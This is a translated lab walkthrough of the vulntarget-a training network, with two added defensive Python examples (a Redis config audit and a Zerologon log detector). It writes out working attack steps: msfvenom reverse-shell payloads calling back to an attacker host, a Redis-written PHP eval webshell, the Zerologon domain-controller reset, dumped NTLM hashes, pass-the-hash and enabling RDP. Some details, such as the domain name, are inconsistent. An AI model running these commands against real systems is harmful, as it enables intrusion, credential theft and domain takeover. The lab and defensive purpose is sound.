[Lab Walkthrough] vulntarget-a vulnerability lab walkthrough
Disclaimer
The technical articles on this public account are for reference only. The information in this article is provided solely so that security personnel can test or maintain the websites, servers and other assets (including but not limited to these) they are responsible for. Do not use the technical material in this article to intrude into any computer system without authorization. Any direct or indirect consequences and losses resulting from use of the information in this article are the sole responsibility of the user. The tools provided in this article are for learning only; any other use is prohibited!!!
Lab overview
The vulntarget-a vulnerability lab was designed and built by the vulntarget team itself; it covers web vulnerabilities, host vulnerabilities, domain vulnerabilities, ICS vulnerabilities and more.
Lab topology
The topology diagram above is for reference only; the addresses used in this walkthrough are configured as follows:
Kali attacker: 192.168.52.128
Win11 attacker: 192.168.52.1
Win7 application server: 192.168.52.129, 10.0.20.98
Win16 domain member server: 10.0.20.99, 10.0.10.111
Win19 domain controller: 10.0.10.110
Walkthrough
Taking the application server via the Tongda OA vulnerability
Approach: the application server is taken mainly through the Tongda OA vulnerability; EternalBlue would also give access to the server, and the approach is much the same.
This walkthrough uses the lab environment provided by the vulntarget team as-is. Once the servers are up, scan the win7 address for open ports and services:
The server has port 80 open; visiting it identifies Tongda OA, so it is tested directly with a tool.
Once a shell is obtained, connect with AntSword or Godzilla.
Run a command to inspect the network adapters; the host currently has two.
ipconfig (if the output is garbled, set the encoding to GB2312 in the client's basic settings)
Bringing the session into CS and MSF
To make session management and post-exploitation easier, it is best to move the session into CS and MSF.
Checking in to CS
Upload the CS implant to the target server
Run the implant to obtain a CS session
Checking in to MSF
In the lab design, the second layer is reached through Redis; it is tested with tools on Kali.
Generate a reverse-connection payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=5555 -f exe > /root/msfshell/5555.exe
Listen with msf:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LhOST 192.168.52.128
LhOST => 192.168.52.128
msf6 exploit(multi/handler) > set LPORT
LPORT => 4444
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.52.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.52.128:5555
[*] Sending stage (201798 bytes) to 192.168.52.129
[*] Meterpreter session 1 opened (192.168.52.128:5555 -> 192.168.52.129:51972) at 2024-06-18 16:55:10 +0800
Run the payload from Godzilla on the win7 application server, and the MSF session is obtained.
Add routes, set up a proxy, and use arp to find the IPs in the internal subnet.
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.0.20.0 255.255.255.0 Session 20
192.168.52.0 255.255.255.0 Session 20
With the route added, use socks_proxy to start a SOCKS proxy service.
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface
to listen on. This must be an addres
s on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 2222 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted:
4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
With the SOCKS proxy running, proxychains4 is used; it must be configured first:
sudo vim /etc/proxychains4.conf
In the shell, use arp -a to look for addresses outside the 192.168.52.0/24 range.
10.0.20.99 is found. Scan it with nmap; because this is only a common-ports scan, port 6379 is not detected.
sudo proxychains4 nmap -sT -Pn 10.0.20.99
The Redis port can be scanned directly. The scan must be run as root, otherwise the port is reported as filtered.
sudo proxychains4 nmap -sT -p 6379 -Pn 10.0.20.99
Getting a shell through unauthenticated Redis
Unauthenticated Redis access is combined with the PHP web environment to get a shell.
Writing a webshell through unauthenticated Redis
└─$ sudo proxychains4 redis-cli -h 10.0.20.99
[sudo] kali 的密码:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 192.168.52.128:2222 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
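For the defensive side of the write shown above, here is an added example (not from the lab or the article) that audits a redis.conf for the settings that make this CONFIG SET dir/dbfilename + SAVE write possible; the two sample configs inside it are constructed.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client turn
Redis into a file writer (CONFIG SET dir/dbfilename + SAVE). Added example,
not from the lab; the sample configs at the bottom are constructed."""
import shlex


def parse_redis_conf(text):
    """Map directive -> args (last one wins); rename-command is collected as a list."""
    conf = {"rename-command": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted arguments such as ""
        key, args = parts[0].lower(), parts[1:]
        if key == "rename-command":
            conf[key].append((args[0].upper(), args[1] if len(args) > 1 else ""))
        else:
            conf[key] = args
    return conf


def audit_redis_conf(text):
    """Return findings as strings; an empty list means no weak setting was found."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get("bind", [])
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("no restrictive 'bind': reachable from other hosts")
    if not conf.get("requirepass"):
        findings.append("no 'requirepass': unauthenticated clients accepted")
    if conf.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("'protected-mode no' removes the default safeguard")
    # The write primitive needs CONFIG SET; renaming CONFIG to "" removes it.
    if not any(old == "CONFIG" and new == "" for old, new in conf["rename-command"]):
        findings.append("CONFIG still available: dir/dbfilename changeable at runtime")
    # Redis 7+ blocks CONFIG SET dir/dbfilename unless this is explicitly 'yes'.
    if conf.get("enable-protected-configs", ["no"])[0].lower() == "yes":
        findings.append("'enable-protected-configs yes' re-enables dir/dbfilename changes")
    return findings


# Constructed samples: an exposed instance like the lab's, and a hardened one.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = """bind 127.0.0.1
protected-mode yes
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
"""
```

Running audit_redis_conf on a real redis.conf lists exactly which of the four conditions behind the write above still hold.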
After the shell is written, connect with Godzilla or AntSword.
To connect with AntSword, configure the proxy first.
Here I go straight for a reverse connection and generate a reverse payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.98 LPORT=5555 -f exe -o 123.exe
Upload it to the second-layer target, the win2016 server, and run it.
Listen with msf on Kali:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.20.98
set LPORT 5555
options
Once it runs, the MSF session is obtained.
In the shell, run ipconfig to view the adapters.
The address 10.0.10.111 is found.
The current privilege level is administrator.
Taking the domain controller, win2019
Enumerating the domain controller
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
The DC IP is 10.0.10.110
Account: WIN-UKFQSV1OMUB
Domain: balsec.com
Add the route again:
run post/multi/manage/autoroute
View the current routing information
Test whether the DC 10.0.10.110 is reachable by scanning it with nmap.
Going straight for domain privilege escalation
Test whether the vulnerability exists on the DC
sudo proxychains4 python3 zerologon_tester.py win2019 10.0.10.110
If "success" is printed, the vulnerability is present.
Run the exploit directly
Use the zerologon tool to reset the DC's password to empty
(The account blanked here is the machine account of the DC host, not a domain user account.)
sudo proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110
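As an added detection example (not part of the article), the following parses Windows event XML and flags the traces this kind of machine account reset leaves on the DC: Security event 4742 whose subject is ANONYMOUS LOGON, and the Netlogon events 5827-5829 that patched DCs log for vulnerable secure channel connections; the sample events and host names are constructed.

```python
"""Flag Windows events consistent with a Zerologon-style reset of a DC machine
account password: Security event 4742 (computer account changed) with subject
ANONYMOUS LOGON, and Netlogon events 5827-5829. Added example; XML is constructed."""
import xml.etree.ElementTree as ET


def parse_event(xml_text):
    """Flatten one event: EventID, Computer and every <Data Name=...> field."""
    ev = {}
    for el in ET.fromstring(xml_text).iter():
        name = el.tag.rsplit("}", 1)[-1]  # drop the Windows event namespace
        if name in ("EventID", "Computer"):
            ev[name] = (el.text or "").strip()
        elif name == "Data" and el.get("Name"):
            ev[el.get("Name")] = (el.text or "").strip()
    return ev


def is_suspicious(ev):
    """Return a reason if the event matches a Zerologon indicator, else None."""
    eid = ev.get("EventID")
    if eid == "4742" and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON":
        return "computer account %s changed by ANONYMOUS LOGON" % ev.get("TargetUserName")
    if eid in {"5827", "5828", "5829"}:  # vulnerable Netlogon secure channel reported
        return "Netlogon event %s: vulnerable secure channel connection" % eid
    return None


def flag_events(xml_events):
    """Return [(computer, reason)] for every suspicious event in the batch."""
    hits = []
    for xml_text in xml_events:
        ev = parse_event(xml_text)
        reason = is_suspicious(ev)
        if reason:
            hits.append((ev.get("Computer", "?"), reason))
    return hits


# Constructed sample events (namespace as Windows emits it; host names invented).
NS = 'xmlns="http://schemas.microsoft.com/win/2004/08/events/event"'
SAMPLE_EVENTS = [
    f'<Event {NS}><System><EventID>4742</EventID><Computer>dc01.example.test'
    '</Computer></System><EventData><Data Name="SubjectUserName">ANONYMOUS LOGON'
    '</Data><Data Name="TargetUserName">DC01$</Data></EventData></Event>',
    f'<Event {NS}><System><EventID>4742</EventID><Computer>dc01.example.test'
    '</Computer></System><EventData><Data Name="SubjectUserName">DC01$</Data>'
    '<Data Name="TargetUserName">DC01$</Data></EventData></Event>',
    f'<Event {NS}><System><EventID>5829</EventID><Computer>dc01.example.test'
    '</Computer></System></Event>',
]
```

The second sample, a routine 4742 raised by the computer account itself, is deliberately not flagged; only the anonymous-subject change and the Netlogon warning are.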
Dump the DC hashes (cd into the example directory first):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:839b6abacd6c6bdd814f0ba6fb0f94f9:::
WIN-UKFQSV1OMUB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
[*] Kerberos keys grabbed
[*] Cleaning up...
With that, the DC is taken directly:
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
Enabling 3389 (Remote Desktop)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Log in over 3389 directly: proxychains4 rdesktop 10.0.10.110
Account: balsec.com\administrator  Password: Admin@666